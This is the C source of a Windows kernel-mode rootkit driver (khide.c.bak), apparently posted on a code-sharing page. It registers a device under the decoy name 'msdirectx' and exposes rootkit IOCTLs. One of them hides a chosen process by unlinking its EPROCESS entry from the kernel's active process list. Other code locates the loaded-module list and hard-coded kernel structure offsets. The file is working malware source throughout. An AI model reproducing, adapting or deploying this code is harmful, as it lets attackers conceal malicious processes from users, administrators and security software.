📄 khide.c.bak
字号:
#include "ntddk.h"
#include "stdio.h"
#include "stdlib.h"
#include "KHide.h"
#include "ProcessName.h"
#include "ioctlcmd.h"
const WCHAR deviceLinkBuffer[] = L"\\DosDevices\\msdirectx";
const WCHAR deviceNameBuffer[] = L"\\Device\\msdirectx";
#define DebugPrint DbgPrint
NTSTATUS DriverEntry(
IN PDRIVER_OBJECT DriverObject,
IN PUNICODE_STRING RegistryPath
)
{
NTSTATUS ntStatus;
UNICODE_STRING deviceNameUnicodeString;
UNICODE_STRING deviceLinkUnicodeString;
// Setup our name and symbolic link.
RtlInitUnicodeString (&deviceNameUnicodeString,
deviceNameBuffer );
RtlInitUnicodeString (&deviceLinkUnicodeString,
deviceLinkBuffer );
// Set up the device
//
ntStatus = IoCreateDevice ( DriverObject,
0, // For driver extension
&deviceNameUnicodeString,
FILE_DEVICE_ROOTKIT,
0,
TRUE,
&g_HKideDevice );
if(! NT_SUCCESS(ntStatus))
{
DebugPrint(("Failed to create device!\n"));
return ntStatus;
}
ntStatus = IoCreateSymbolicLink (&deviceLinkUnicodeString,
&deviceNameUnicodeString );
if(! NT_SUCCESS(ntStatus))
{
IoDeleteDevice(DriverObject->DeviceObject);
DebugPrint("Failed to create symbolic link!\n");
return ntStatus;
}
// Create dispatch points for all routines that must be handled
DriverObject->MajorFunction[IRP_MJ_SHUTDOWN] =
DriverObject->MajorFunction[IRP_MJ_CREATE] =
DriverObject->MajorFunction[IRP_MJ_CLOSE] =
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = HKideDispatch;
// Its extremely unsafe to unload a system-call hooker.
// Use GREAT caution.
DriverObject->DriverUnload = HKideUnload;
// Get the offset of the process name in the EPROCESS structure.
gul_ProcessNameOffset = GetLocationOfProcessName(PsGetCurrentProcess());
if (!gul_ProcessNameOffset)
{
IoDeleteSymbolicLink( &deviceLinkUnicodeString );
// Delete the device object
IoDeleteDevice( DriverObject->DeviceObject );
return STATUS_UNSUCCESSFUL;
}
//dengxin
gModuleEntry = (PMODULE_ENTRY) FindPsLoadedModuleList(DriverObject);
if (!gModuleEntry)
{
IoDeleteSymbolicLink( &deviceLinkUnicodeString );
// Delete the device object
DebugPrint("Failed to create gul_PsLoadedModuleList link!\n");
IoDeleteDevice( DriverObject->DeviceObject );
return STATUS_UNSUCCESSFUL;
}
return STATUS_SUCCESS;
}
NTSTATUS HKideUnload(IN PDRIVER_OBJECT DriverObject)
{
UNICODE_STRING deviceLinkUnicodeString;
PDEVICE_OBJECT p_NextObj;
p_NextObj = DriverObject->DeviceObject;
if (p_NextObj != NULL)
{
// Delete the symbolic link for our device
//
RtlInitUnicodeString( &deviceLinkUnicodeString, deviceLinkBuffer );
IoDeleteSymbolicLink( &deviceLinkUnicodeString );
// Delete the device object
//
IoDeleteDevice( DriverObject->DeviceObject );
return STATUS_SUCCESS;
}
return STATUS_SUCCESS;
}
NTSTATUS
HKideDispatch(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp
)
{
PIO_STACK_LOCATION irpStack;
PVOID inputBuffer;
PVOID outputBuffer;
ULONG inputBufferLength;
ULONG outputBufferLength;
ULONG ioControlCode;
NTSTATUS ntstatus;
//
// Go ahead and set the request up as successful
//
ntstatus = Irp->IoStatus.Status = STATUS_SUCCESS;
Irp->IoStatus.Information = 0;
//
// Get a pointer to the current location in the Irp. This is where
// the function codes and parameters are located.
//
irpStack = IoGetCurrentIrpStackLocation (Irp);
//
// Get the pointer to the input/output buffer and its length
//
inputBuffer = Irp->AssociatedIrp.SystemBuffer;
inputBufferLength = irpStack->Parameters.DeviceIoControl.InputBufferLength;
outputBuffer = Irp->AssociatedIrp.SystemBuffer;
outputBufferLength = irpStack->Parameters.DeviceIoControl.OutputBufferLength;
ioControlCode = irpStack->Parameters.DeviceIoControl.IoControlCode;
switch (irpStack->MajorFunction) {
case IRP_MJ_CREATE:
break;
case IRP_MJ_SHUTDOWN:
break;
case IRP_MJ_CLOSE:
break;
case IRP_MJ_DEVICE_CONTROL:
if(IOCTL_TRANSFER_TYPE(ioControlCode) == METHOD_NEITHER) {
outputBuffer = Irp->UserBuffer;
}
// Its a request from rootkit
ntstatus = HKideDeviceControl( irpStack->FileObject, TRUE,
inputBuffer, inputBufferLength,
outputBuffer, outputBufferLength,
ioControlCode, &Irp->IoStatus, DeviceObject );
break;
}
IoCompleteRequest( Irp, IO_NO_INCREMENT );
return ntstatus;
}
NTSTATUS
HKideDeviceControl(
IN PFILE_OBJECT FileObject,
IN BOOLEAN Wait,
IN PVOID InputBuffer,
IN ULONG InputBufferLength,
OUT PVOID OutputBuffer,
IN ULONG OutputBufferLength,
IN ULONG IoControlCode,
OUT PIO_STATUS_BLOCK IoStatus,
IN PDEVICE_OBJECT DeviceObject
)
{
NTSTATUS ntStatus;
UNICODE_STRING deviceLinkUnicodeString;
MODULE_ENTRY m_current;
PMODULE_ENTRY pm_current;
ANSI_STRING ansi_DriverName;
ANSI_STRING hide_DriverName;
UNICODE_STRING uni_hide_DriverName;
int i_count = 0, i_numLogs = 0, find_PID = 0;
int nluids = 0, i_PrivCount = 0, i_VariableLen = 0;
int i_LuidsUsed = 0, luid_attr_count = 0, i_SidCount = 0;
int i_SidSize = 0, i_spaceNeeded = 0, i_spaceSaved = 0;
int i_spaceUsed = 0, sid_count = 0;
DWORD eproc = 0x00000000;
DWORD start_eproc= 0x00000000;
DWORD token = 0x00000000;
PLIST_ENTRY plist_active_procs = NULL;
PLUID_AND_ATTRIBUTES luids_attr = NULL;
PLUID_AND_ATTRIBUTES luids_attr_orig = NULL;
PSID_AND_ATTRIBUTES sid_ptr_old = NULL;
void *varpart = NULL, *varbegin = NULL, *psid = NULL;
DWORD SizeOfOldSids, SizeOfLastSid, d_SidStart;
IoStatus->Status = STATUS_SUCCESS;
IoStatus->Information = 0;
switch ( IoControlCode )
{
case IOCTL_ROOTKIT_INIT:
if ((InputBufferLength < sizeof(int) * 8) || (InputBuffer == NULL))
{
IoStatus->Status = STATUS_INVALID_BUFFER_SIZE;
break;
}
PIDOFFSET = (int) (*(int *)InputBuffer);
FLINKOFFSET = (int) (*((int *)InputBuffer+1));
AUTHIDOFFSET = (int) (*((int *)InputBuffer+2));
TOKENOFFSET = (int) (*((int *)InputBuffer+3));
PRIVCOUNTOFFSET = (int) (*((int *)InputBuffer+4));
PRIVADDROFFSET = (int) (*((int *)InputBuffer+5));
SIDCOUNTOFFSET = (int) (*((int *)InputBuffer+6));
SIDADDROFFSET = (int) (*((int *)InputBuffer+7));
break;
case IOCTL_ROOTKIT_HIDEME:
if ((InputBufferLength < sizeof(DWORD)) || (InputBuffer == NULL))
{
IoStatus->Status = STATUS_INVALID_BUFFER_SIZE;
break;
}
find_PID = *((DWORD *)InputBuffer);
if (find_PID == 0x00000000)
{
IoStatus->Status = STATUS_INVALID_PARAMETER;
break;
}
eproc = FindProcessEPROC(find_PID);
if (eproc == 0x00000000)
{
IoStatus->Status = STATUS_INVALID_PARAMETER;
break;
}
plist_active_procs = (LIST_ENTRY *) (eproc+FLINKOFFSET);
*((DWORD *)plist_active_procs->Blink) = (DWORD) plist_active_procs->Flink;
*((DWORD *)plist_active_procs->Flink+1) = (DWORD) plist_active_procs->Blink;
break;
default:
IoStatus->Status = STATUS_INVALID_DEVICE_REQUEST;
break;
}
return IoStatus->Status;
}
//////////////////////////////////////////////////////////////////////////////
// Finds and returns the address of the PsLoadedModuleList. This is based on
// the information provided by Edgar Barbosa in his paper "Finding some
// non-exported kernel variables in Windows XP". Works with Windows XP and
// Windows 2003.
DWORD Non2000FindPsLoadedModuleList (void)
{
DWORD address = 0x00000000;
__asm {
mov eax, fs:[0x34]; // Get address of KdVersionBlock
mov eax, [eax+0x70]; // Get address of PsLoadedModuleList
mov address, eax;
}
return address;
}
DWORD FindPsLoadedModuleList (IN PDRIVER_OBJECT DriverObject)
{
PMODULE_ENTRY pm_current;
if (DriverObject == NULL)
return 0;
pm_current = *((PMODULE_ENTRY*)((DWORD)DriverObject + 0x14));
if (pm_current == NULL)
return 0;
return (DWORD) pm_current;
/* gul_PsLoadedModuleList = pm_current;
while ((PMODULE_ENTRY)pm_current->le_mod.Flink != gul_PsLoadedModuleList)
{
//DbgPrint("Module at 0x%x unk1 0x%x path.length 0x%x name.length 0x%x\n", pm_current, pm_current->unk1, pm_current->driver_Path.Length, pm_current->driver_Name.Length);
// This works on Windows XP SP1 and Windows 2003.
if ((pm_current->unk1 == 0x00000000) && (pm_current->driver_Path.Length == 0))
{
return (DWORD) pm_current;
}
pm_current = (MODULE_ENTRY*)pm_current->le_mod.Flink;
}
return 0;
*/
}
DWORD FindProcessToken (DWORD eproc)
{
DWORD token;
__asm {
mov eax, eproc;
add eax, TOKENOFFSET;
mov eax, [eax];
and eax, 0xfffffff8; // Added for XP. See definition of _EX_FAST_REF
mov token, eax;
}
return token;
}
//////////////////////////////////////////////////////////////////////////////
// This function was originally written mostly in assembly language. Now let's
// make it readable to the masses.
DWORD FindProcessEPROC (int terminate_PID)
{
DWORD eproc = 0x00000000;
int current_PID = 0;
int start_PID = 0;
int i_count = 0;
PLIST_ENTRY plist_active_procs;
if (terminate_PID == 0)
return terminate_PID;
eproc = (DWORD) PsGetCurrentProcess();
start_PID = *((DWORD*)(eproc+PIDOFFSET));
current_PID = start_PID;
while(1)
{
if(terminate_PID == current_PID)
return eproc;
else if((i_count >= 1) && (start_PID == current_PID))
{
return 0x00000000;
}
else {
plist_active_procs = (LIST_ENTRY *) (eproc+FLINKOFFSET);
eproc = (DWORD) plist_active_procs->Flink;
eproc = eproc - FLINKOFFSET;
current_PID = *((int *)(eproc+PIDOFFSET));
i_count++;
}
}
}⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -